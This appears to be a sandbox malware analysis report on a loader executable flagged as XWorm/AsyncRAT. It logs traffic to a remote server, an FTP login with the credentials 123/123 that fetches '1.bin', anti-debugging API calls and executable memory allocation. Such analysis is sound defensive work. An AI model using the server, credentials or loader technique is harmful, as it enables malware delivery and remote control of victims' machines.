Jan 2, 2025 09:03:01.902957916 CET	7000	50004	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:01.903040886 CET	50004	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:01.953908920 CET	50004	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:01.958702087 CET	7000	50004	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:03.919349909 CET	7000	50004	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:03.923398018 CET	50004	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:07.208937883 CET	50004	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:07.211355925 CET	50005	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:07.213831902 CET	7000	50004	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:07.216217995 CET	7000	50005	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:07.216309071 CET	50005	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:07.312318087 CET	50005	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:07.317208052 CET	7000	50005	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:07.333623886 CET	50005	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:07.338500977 CET	7000	50005	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:09.230184078 CET	7000	50005	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:09.230258942 CET	50005	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:12.912708044 CET	50005	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:12.917540073 CET	7000	50005	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:12.919732094 CET	50006	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:12.924751997 CET	7000	50006	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:12.924818039 CET	50006	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:13.013223886 CET	50006	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:13.018141985 CET	7000	50006	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:14.932981968 CET	7000	50006	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:14.933161974 CET	50006	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:18.192847967 CET	50006	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:18.194894075 CET	50007	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:18.197742939 CET	7000	50006	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:18.199809074 CET	7000	50007	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:18.199866056 CET	50007	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:18.225589991 CET	50007	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:18.230331898 CET	7000	50007	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:20.235207081 CET	7000	50007	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:20.235333920 CET	50007	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:23.520988941 CET	50007	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:23.522897959 CET	50008	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:23.525984049 CET	7000	50007	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:23.527672052 CET	7000	50008	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:23.527760983 CET	50008	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:23.580874920 CET	50008	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:23.585688114 CET	7000	50008	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:25.525473118 CET	7000	50008	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:25.525542974 CET	50008	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:28.615948915 CET	50008	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:28.615947962 CET	50009	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:28.621114969 CET	7000	50008	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:28.621129990 CET	7000	50009	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:28.621262074 CET	50009	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:28.681447029 CET	50009	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:28.686274052 CET	7000	50009	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:28.865437031 CET	50009	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:03:28.870273113 CET	7000	50009	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:30.656801939 CET	7000	50009	45.207.215.58	192.168.2.9
Jan 2, 2025 09:03:30.657100916 CET	50009	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:04:01.281883955 CET	50009	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:04:01.285722971 CET	50021	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:04:01.286744118 CET	7000	50009	45.207.215.58	192.168.2.9
Jan 2, 2025 09:04:01.290582895 CET	7000	50021	45.207.215.58	192.168.2.9
Jan 2, 2025 09:04:01.290692091 CET	50021	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:04:01.343066931 CET	50021	7000	192.168.2.9	45.207.215.58
Jan 2, 2025 09:04:01.347881079 CET	7000	50021	45.207.215.58	192.168.2.9
Jan 2, 2025 09:04:01.628388882 CET	50021	7000	192.168.2.9	45.207.215.58

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 09:00:59.838582993 CET	1.1.1.1	192.168.2.9	0x19a2	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 2, 2025 09:00:59.838582993 CET	1.1.1.1	192.168.2.9	0x19a2	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 2, 2025 09:01:04.115503073 CET	21	49726	45.207.215.58	192.168.2.9	220 Welcome to JDFW FTP Server V4.0.0
Jan 2, 2025 09:01:04.115994930 CET	49726	21	192.168.2.9	45.207.215.58	USER 123
Jan 2, 2025 09:01:04.422133923 CET	21	49726	45.207.215.58	192.168.2.9	331 Password required for 123
Jan 2, 2025 09:01:04.422363043 CET	49726	21	192.168.2.9	45.207.215.58	PASS 123
Jan 2, 2025 09:01:04.895879984 CET	21	49726	45.207.215.58	192.168.2.9	230 Client :123 successfully logged in. Client IP :8.46.123.189
Jan 2, 2025 09:01:04.896173954 CET	49726	21	192.168.2.9	45.207.215.58	TYPE I
Jan 2, 2025 09:01:05.202058077 CET	21	49726	45.207.215.58	192.168.2.9	200 Type set to I
Jan 2, 2025 09:01:05.202485085 CET	49726	21	192.168.2.9	45.207.215.58	PASV
Jan 2, 2025 09:01:05.968811035 CET	21	49726	45.207.215.58	192.168.2.9	227 Entering Passive Mode (45,207,215,58,4,3).
Jan 2, 2025 09:01:06.281235933 CET	21	49726	45.207.215.58	192.168.2.9	213 71938
Jan 2, 2025 09:01:06.281836033 CET	49726	21	192.168.2.9	45.207.215.58	RETR /1.bin
Jan 2, 2025 09:01:07.000880957 CET	21	49726	45.207.215.58	192.168.2.9	150 Opening BINARY mode data connection for file transfer.
Jan 2, 2025 09:01:07.258071899 CET	21	49726	45.207.215.58	192.168.2.9	226 Transfer complete.

Target ID:	0
Start time:	03:01:01
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\1.exe"
Imagebase:	0xbd0000
File size:	1'684'480 bytes
MD5 hash:	47F8252DF69F15858C9EBB9E27EE2201
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3120815982.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.3120835473.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp, Author: Sekoia.io Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3121858092.00000000061D0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:03:32
Start date:	02/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7804 -s 1764
Imagebase:	0xc90000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	6.6%
Signature Coverage:	19%
Total number of Nodes:	531
Total number of Limit Nodes:	33

Executed Functions

Function 00BE7585 Relevance: 103.8, APIs: 48, Strings: 11, Instructions: 557
libraryloaderstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_GS.LIBCMT ref: 00BE758F

Part of subcall function 00BD8348: __EH_prolog3.LIBCMT ref: 00BD834F
Part of subcall function 00BD8348: GetWindowDC.USER32(00000000,00000004,00BE7088,00000000,?,?,00CF5D10), ref: 00BD837B

GetDeviceCaps.GDI32(?,00000058), ref: 00BE75B5
DeleteObject.GDI32(00000000), ref: 00BE7616
DeleteObject.GDI32(00000000), ref: 00BE7633
DeleteObject.GDI32(00000000), ref: 00BE7650
DeleteObject.GDI32(00000000), ref: 00BE7667
DeleteObject.GDI32(00000000), ref: 00BE7684
DeleteObject.GDI32(00000000), ref: 00BE769B
DeleteObject.GDI32(00000000), ref: 00BE76B2
DeleteObject.GDI32(00000000), ref: 00BE76C9
DeleteObject.GDI32(00000000), ref: 00BE76E6
DeleteObject.GDI32(00000000), ref: 00BE76FD
_memset.LIBCMT ref: 00BE7714
GetTextCharsetInfo.GDI32(?,00000000,00000000), ref: 00BE7724
lstrcpyA.KERNEL32(?,?), ref: 00BE7773
EnumFontFamiliesA.GDI32(?,00000000,Function_0001753C), ref: 00BE779A
lstrcpyA.KERNEL32(?), ref: 00BE77AA
EnumFontFamiliesA.GDI32(?,00000000,Function_0001753C), ref: 00BE77C5
lstrcpyA.KERNEL32(?), ref: 00BE77DD
CreateFontIndirectA.GDI32(?), ref: 00BE77E9
CreateFontIndirectA.GDI32(?), ref: 00BE7839
CreateFontIndirectA.GDI32(?), ref: 00BE7874
CreateFontIndirectA.GDI32(?), ref: 00BE789C
CreateFontIndirectA.GDI32(?), ref: 00BE78B9
GetSystemMetrics.USER32(00000048), ref: 00BE78D4
lstrcpyA.KERNEL32(?), ref: 00BE78E8
CreateFontIndirectA.GDI32(?), ref: 00BE78EE
GetStockObject.GDI32(00000011), ref: 00BE791C
GetObjectA.GDI32(?,0000003C,?), ref: 00BE793E
lstrcpyA.KERNEL32(?), ref: 00BE7977
CreateFontIndirectA.GDI32(?), ref: 00BE7981
CreateFontIndirectA.GDI32(?), ref: 00BE79A0
GetStockObject.GDI32(00000011), ref: 00BE79B6
GetObjectA.GDI32(?,0000003C,?), ref: 00BE79C7
CreateFontIndirectA.GDI32(?), ref: 00BE79D1
CreateFontIndirectA.GDI32(?), ref: 00BE79F4
__EH_prolog3_GS.LIBCMT ref: 00BE7A7F
GetVersionExA.KERNEL32(?,0000009C), ref: 00BE7BD5
KiUserCallbackDispatcher.NTDLL(00001000), ref: 00BE7BE0
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 00BE7C65
GetProcAddress.KERNEL32(?,DrawThemeTextEx), ref: 00BE7C78
GetProcAddress.KERNEL32(?,BufferedPaintInit), ref: 00BE7C8B
GetProcAddress.KERNEL32(?,BufferedPaintUnInit), ref: 00BE7C9E
GetProcAddress.KERNEL32(?,BeginBufferedPaint), ref: 00BE7CB1
GetProcAddress.KERNEL32(?,EndBufferedPaint), ref: 00BE7CC4
GetProcAddress.KERNEL32(00000000,DwmExtendFrameIntoClientArea), ref: 00BE7D0D
GetProcAddress.KERNEL32(?,DwmDefWindowProc), ref: 00BE7D20
GetProcAddress.KERNEL32(?,DwmIsCompositionEnabled), ref: 00BE7D33

Strings

DwmExtendFrameIntoClientArea, xrefs: 00BE7D07
DrawThemeParentBackground, xrefs: 00BE7C5F
EndBufferedPaint, xrefs: 00BE7CB3
dwmapi.dll, xrefs: 00BE7CF2
BufferedPaintUnInit, xrefs: 00BE7C8D
DwmIsCompositionEnabled, xrefs: 00BE7D22
DwmDefWindowProc, xrefs: 00BE7D0F
BufferedPaintInit, xrefs: 00BE7C7A
BeginBufferedPaint, xrefs: 00BE7CA0
UxTheme.dll, xrefs: 00BE7C44
DrawThemeTextEx, xrefs: 00BE7C67

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Object$Font$CreateDeleteIndirect$AddressProc$lstrcpy$EnumFamiliesH_prolog3_Stock$CallbackCapsCharsetDeviceDispatcherH_prolog3InfoMetricsSystemTextUserVersionWindow_memset
String ID: BeginBufferedPaint$BufferedPaintInit$BufferedPaintUnInit$DrawThemeParentBackground$DrawThemeTextEx$DwmDefWindowProc$DwmExtendFrameIntoClientArea$DwmIsCompositionEnabled$EndBufferedPaint$UxTheme.dll$dwmapi.dll
API String ID: 2460119550-1174303547
Opcode ID: 41565a25ad43cf32b5fb8c3605e4fdadd4bd7362c83a8168a4a53432f903b28e
Instruction ID: 8dff015a60e402f518f0b39f59cf23f2497399f48e791c54bf802f5c6c9fe42b
Opcode Fuzzy Hash: 41565a25ad43cf32b5fb8c3605e4fdadd4bd7362c83a8168a4a53432f903b28e
Instruction Fuzzy Hash: 9E3226B08417599FCB21DFB9C884BDEFBF8AF54700F1048AEE5AA96251DB706A41CF50

Function 00BD15B0 Relevance: 33.7, APIs: 9, Strings: 10, Instructions: 474
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00BD1100: GetEnvironmentVariableA.KERNEL32(TEMP,00000000,00001000), ref: 00BD115C
Part of subcall function 00BD1100: FindFirstFileA.KERNEL32(?,?,00000002), ref: 00BD11B5
Part of subcall function 00BD1100: FindNextFileA.KERNELBASE(00000000,?), ref: 00BD11CF
Part of subcall function 00BD1100: FindClose.KERNEL32(00000000), ref: 00BD11D6
Part of subcall function 00BD1100: _wprintf.LIBCMT ref: 00BD11E2

Part of subcall function 00BD23E0: std::_Xinvalid_argument.LIBCPMT ref: 00BD243C
Part of subcall function 00BD23E0: _memmove.LIBCMT ref: 00BD2482

GetCurrentProcess.KERNEL32(91693692), ref: 00BD16D1
CheckRemoteDebuggerPresent.KERNEL32(00000000,?), ref: 00BD16DB
GetCurrentProcess.KERNEL32(00000000), ref: 00BD16F3
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00BD16FC
GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 00BD1708
NtQueryInformationProcess.NTDLL(00000000,00000007,?,00000004,00000000), ref: 00BD171B
VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00BD1BC4
_memmove.LIBCMT ref: 00BD1BDF
InitOnceExecuteOnce.KERNEL32(?,?,00000000,?), ref: 00BD1C03

Strings

123, xrefs: 00BD1677, 00BD16A1
NtQueryInformationProcess, xrefs: 00BD1702
www.baidu.com, xrefs: 00BD15E8
www.bing.com, xrefs: 00BD1614
$, xrefs: 00BD1B40
ntdll.dll, xrefs: 00BD16F5
207, xrefs: 00BD1763
ftp, xrefs: 00BD1641
1.bin, xrefs: 00BD17EB
215, xrefs: 00BD178D

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: FindProcess$CurrentFileOnce_memmove$AddressAllocCheckCloseDebuggerEnvironmentExecuteFirstHandleInformationInitModuleNextPresentProcQueryRemoteVariableVirtualXinvalid_argument_wprintfstd::_
String ID: $$1.bin$123$207$215$NtQueryInformationProcess$ftp$ntdll.dll$www.baidu.com$www.bing.com
API String ID: 598563768-4122885722
Opcode ID: 65ffeee9f4b1b9793b79a64faccbb7bf23bf1f57b0e6b0b43016d907f0eca808
Instruction ID: 6cd6a9715864de0d22f11091da6cf90d5f4f0bd49448a33ba56b88312aaca0d2
Opcode Fuzzy Hash: 65ffeee9f4b1b9793b79a64faccbb7bf23bf1f57b0e6b0b43016d907f0eca808
Instruction Fuzzy Hash: 3E3208B1C012A99BDF22DB698C457DDFBB8AF18700F0445EAE50867312EB745B84CF91

Function 00BD1300 Relevance: 28.7, APIs: 19, Instructions: 207
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00BD1335
_memset.LIBCMT ref: 00BD1348
_memset.LIBCMT ref: 00BD135B
_memset.LIBCMT ref: 00BD136E
_memset.LIBCMT ref: 00BD1381
_memset.LIBCMT ref: 00BD1394

Part of subcall function 00BD1240: _memset.LIBCMT ref: 00BD124E
Part of subcall function 00BD1240: _memset.LIBCMT ref: 00BD125E
Part of subcall function 00BD1240: _memset.LIBCMT ref: 00BD126E
Part of subcall function 00BD1240: _memset.LIBCMT ref: 00BD127E
Part of subcall function 00BD1240: _memset.LIBCMT ref: 00BD128B
Part of subcall function 00BD1240: _memset.LIBCMT ref: 00BD1298
Part of subcall function 00BD1240: _memset.LIBCMT ref: 00BD12A8
Part of subcall function 00BD1240: InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 00BD12F5

lstrlenA.KERNEL32(?), ref: 00BD13E8
lstrcatA.KERNEL32(?,?), ref: 00BD1400
InternetOpenA.WININET(00D11A14,00000000,00000000,00000000,00000000), ref: 00BD142D
InternetConnectA.WININET(00000000,?,00000000,?,?,00000001,08000000,00000000), ref: 00BD1460
FtpOpenFileA.WININET(00000000,?,80000000,80000002,00000000), ref: 00BD1487
FtpGetFileSize.WININET(00000000,00000000), ref: 00BD149D
_memset.LIBCMT ref: 00BD14C5
_memset.LIBCMT ref: 00BD14E4
InternetReadFile.WININET(?,00000000,00001000,?), ref: 00BD1504
_memmove.LIBCMT ref: 00BD1520

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: _memset$Internet$File$Open$ConnectCrackReadSize_memmovelstrcatlstrlen
String ID:
API String ID: 167602251-0
Opcode ID: 757eeb4d3b08b0fd0aca16e96e6b0711c09b08471e83a47b9e01e18de4f38591
Instruction ID: c9b8f277ef34b6446a9b2cd25d77b0177b809b982df922a39fc6426113160de1
Opcode Fuzzy Hash: 757eeb4d3b08b0fd0aca16e96e6b0711c09b08471e83a47b9e01e18de4f38591
Instruction Fuzzy Hash: B071A3B1900618ABDB20DB65DC85FDAB7B9EF98700F0005DAF509A7241EA75AF94CF90

Function 00BD1100 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00CC6402: __FF_MSGBANNER.LIBCMT ref: 00CC641B
Part of subcall function 00CC6402: __NMSG_WRITE.LIBCMT ref: 00CC6422
Part of subcall function 00CC6402: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00BD7426,00BD7426,?,000000FF,?,00CCCFE9,00000011,00BD7426,?,00CCD3EE,0000000D), ref: 00CC6447

GetEnvironmentVariableA.KERNEL32(TEMP,00000000,00001000), ref: 00BD115C
FindFirstFileA.KERNEL32(?,?,00000002), ref: 00BD11B5
FindNextFileA.KERNELBASE(00000000,?), ref: 00BD11CF
FindClose.KERNEL32(00000000), ref: 00BD11D6
_wprintf.LIBCMT ref: 00BD11E2

Strings

TEMP, xrefs: 00BD1157
count:%d, xrefs: 00BD11DD

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Find$File$AllocateCloseEnvironmentFirstHeapNextVariable_wprintf
String ID: TEMP$count:%d
API String ID: 1473729317-1945621701
Opcode ID: b751f575ccb7b294b74d2532059f0239f1ca45ecb130f15b58c39287edd991d6
Instruction ID: 33fbe317d9af2e1f5f61a0472491a1e416319c400a112e3639eb6b7689038ece
Opcode Fuzzy Hash: b751f575ccb7b294b74d2532059f0239f1ca45ecb130f15b58c39287edd991d6
Instruction Fuzzy Hash: 8C31F871608381AFD310DB28DC49BABB7E8EB88764F000F6DF595973C1EB75A9058792

Function 061E4D08 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3121874862.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ff6773e8e173ca9ef353c2d318a88f0a386b877323fc1185673377136ad8d00
Instruction ID: 91ba6178d5ca64fb36147c90334351c6fb6fc9854bff8e0e9b42b09d10e7a519
Opcode Fuzzy Hash: 4ff6773e8e173ca9ef353c2d318a88f0a386b877323fc1185673377136ad8d00
Instruction Fuzzy Hash: A0B17C70E00A098FDB54CFA9C8957DEBBF2BF88708F148529E815E7254EB79D845CB81

Function 061E55D8 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3121874862.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 953b106a592014bbf683d196da67da51e5ffc78bd79a56ee8a35414aaa4fb045
Instruction ID: dd579f7f02be3fc37c019bebf6cffeb7631f6e1a9edaf64f55d95e7aab72b42e
Opcode Fuzzy Hash: 953b106a592014bbf683d196da67da51e5ffc78bd79a56ee8a35414aaa4fb045
Instruction Fuzzy Hash: 07B18D70E00649CFDB54CFA9D891B9DBBF2BF48318F148529D814EB294EB75D885CB81

Function 00BE702C Relevance: 64.8, APIs: 43, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00BE7033
GetSysColor.USER32(00000016), ref: 00BE7042
GetSysColor.USER32(0000000F), ref: 00BE704F
GetSysColor.USER32(00000015), ref: 00BE7062
GetSysColor.USER32(0000000F), ref: 00BE706A
GetDeviceCaps.GDI32(?,0000000C), ref: 00BE7090
GetSysColor.USER32(0000000F), ref: 00BE709E
GetSysColor.USER32(00000010), ref: 00BE70A8
GetSysColor.USER32(00000015), ref: 00BE70B2
GetSysColor.USER32(00000016), ref: 00BE70BC
GetSysColor.USER32(00000014), ref: 00BE70C6
GetSysColor.USER32(00000012), ref: 00BE70D0
GetSysColor.USER32(00000011), ref: 00BE70DA
GetSysColor.USER32(00000006), ref: 00BE70E1
GetSysColor.USER32(0000000D), ref: 00BE70E8
GetSysColor.USER32(0000000E), ref: 00BE70EF
GetSysColor.USER32(00000005), ref: 00BE70F6
GetSysColor.USER32(00000008), ref: 00BE7100
GetSysColor.USER32(00000009), ref: 00BE7107
GetSysColor.USER32(00000007), ref: 00BE710E
GetSysColor.USER32(00000002), ref: 00BE7115
GetSysColor.USER32(00000003), ref: 00BE711C
GetSysColor.USER32(0000001B), ref: 00BE7123
GetSysColor.USER32(0000001C), ref: 00BE712D
GetSysColor.USER32(0000000A), ref: 00BE7137
GetSysColor.USER32(0000000B), ref: 00BE7141
GetSysColor.USER32(00000013), ref: 00BE714B
GetSysColor.USER32(0000001A), ref: 00BE7165
GetSysColorBrush.USER32(00000010), ref: 00BE7180
GetSysColorBrush.USER32(00000014), ref: 00BE7197
GetSysColorBrush.USER32(00000005), ref: 00BE71A9
CreateSolidBrush.GDI32(?), ref: 00BE71CD
CreateSolidBrush.GDI32(?), ref: 00BE71E9
CreateSolidBrush.GDI32(?), ref: 00BE7205
CreateSolidBrush.GDI32(?), ref: 00BE7221
CreateSolidBrush.GDI32(?), ref: 00BE723D
CreateSolidBrush.GDI32(?), ref: 00BE7259
CreateSolidBrush.GDI32(?), ref: 00BE7275
CreatePen.GDI32(00000000,00000001), ref: 00BE729E
CreatePen.GDI32(00000000,00000001), ref: 00BE72C1
CreatePen.GDI32(00000000,00000001), ref: 00BE72E4
CreateSolidBrush.GDI32(?), ref: 00BE7368
CreatePatternBrush.GDI32(00000000), ref: 00BE73A9

Part of subcall function 00BD854D: DeleteObject.GDI32(00000000), ref: 00BD855C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Color$BrushCreate$Solid$CapsDeleteDeviceH_prolog3ObjectPattern
String ID:
API String ID: 3754413814-0
Opcode ID: 94c3ddcb6d408cef4ed179443189b6583892dbdde58f4da94bcf03a56e80c94f
Instruction ID: a1d39d0b04785753a4f38d748949bdcdfb4f005f57dda88031639b4a6a6453f5
Opcode Fuzzy Hash: 94c3ddcb6d408cef4ed179443189b6583892dbdde58f4da94bcf03a56e80c94f
Instruction Fuzzy Hash: 86B16B70900B859EDB30BF76CC96BABBBE0AF40701F00496EE19B96691EF74A545DF10

Function 00C34416 Relevance: 40.7, APIs: 22, Strings: 1, Instructions: 421
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00C34420
LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002000), ref: 00C345E2
GetObjectA.GDI32(00000082,00000018,?), ref: 00C345F4
CreateCompatibleDC.GDI32(00000000), ref: 00C34646
GetObjectA.GDI32(00000082,00000018,?), ref: 00C34661
